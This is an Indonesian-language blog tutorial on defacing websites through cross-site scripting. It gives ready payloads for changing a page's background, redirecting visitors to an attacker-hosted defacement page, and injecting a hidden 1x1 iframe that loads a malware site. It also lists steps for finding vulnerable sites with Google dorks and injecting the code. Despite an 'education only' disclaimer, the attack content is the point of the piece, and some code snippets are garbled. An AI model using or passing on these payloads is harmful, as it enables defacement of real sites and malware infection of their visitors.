Daface Poc Xss
[XSS] Cara Deface website dengan Cross Site Scripting
[XSS] Cara Deface website dengan Cross Site Scripting
- Jenis : Tutorial
- Level : Sedang
- Target : Cross Site Scripting (XSS) situs Rentan
- Menurut wikipedia.org Cross Site Scripting (XSS) adalah:
Cross-site scripting (XSS) is a type of computersecurity vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users.
Saya hanya menjelaskannya untuk tujuan pendidikan saja ..................... Merusak adalah salah satu hal yang paling umum saat hacker menemukan kerentanan di situs web. Merusak adalah mengubah konten situs web menjadi konten Hacker. Sebagian besar waktu, penyerang menggunakan teknik ini untuk menginformasikan tentang kerentanan pada Admin. Saya memiliki beberapa metode termudah untuk memperbaiki situs kerentanan XSS.
1 - Script untuk mengubah latar belakang Warna situs web:
gunakan ini di situs target Anda sebagai Kode:<script> document.body.bgColor = "Black"; </ script>
http://www.site.com/<script&...y.bgColor="red";</script>
2 - Script untuk mengubah gambar latar belakang sebuah situs web:
kode :
<script>document.body.background="http://your_image.jpg/";</script>
3 - Halaman Penempatan dengan Pastehtml:
Anda hanya perlu mengunggah beberapa halaman kelalaian ke pastehtml.com dan mendapatkan linknya.Bila Anda menemukan situs XSS yang rentan, maka masukkan script sebagai:
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
Script ini akan mengarahkan halaman ke halaman defender pastehtml Anda.
4 - Defacing dengan iframe Injection
Apa Itu iframe injection ?
Menggunakan tag IFrame, The Attackers menyuntikkan malware berisi situs web (tautan)menggunakan Cross Site Scripting di situs-situs populer. Injeksi IFrame yang tidak terlihat adalah tag yang digunakan untuk memasukkan konten dari sebuah halaman web di dalam halaman yang lain. Jadi, jika pengunjung biasa dari situs populer tersebut membuka situs web, ia akan mengarahkan ke malware berisi situs web.
Perangkat lunak perusak akan dimuat ke komputer Anda, sekarang Anda terinfeksi.
Dengan menggunakan Iframe Injection, penyerang dapat menyuntikkan iklan di dalam situs web lain,
masukkan link situs yang terinfeksi malware, redirect ke situs yang terinfeksi malware dan banyak lagi.
Tutorial Injeksi Iframe:
1. Temukan situs-situs Rentan menggunakan google dorks.
2. Mereka menguji kerentanan dengan memasukkan beberapa tag iframe menggunakan url.
3. Masukkan kode Iframe Berbahaya di dalam halaman web.
Sebagai contoh:
dia bisa memasukkan kode ini menggunakan url:
kode :
Untuk Webpage Php :<iframe src = "http: //malwarewebpages/web.html" width = 1 height = 1 style = "visibility: hidden; position: absolute"> </ iframe>
Kode :
echo "<iframe src = \" http: //malwarewebpages/web.html \ "width = 1 height = 1 style = \" visibility: hidden; position: absolute \ "> </ iframe>";
Ada lebih banyak metode untuk mendeface nya .. Catatan: Anda Hanya bisa deface situs XSS yang Vuln !!
Sekian Dari Manusia_Biasa196 Assalamualikum Walikumsala (≧∇≦)/.
Komentar
Posting Komentar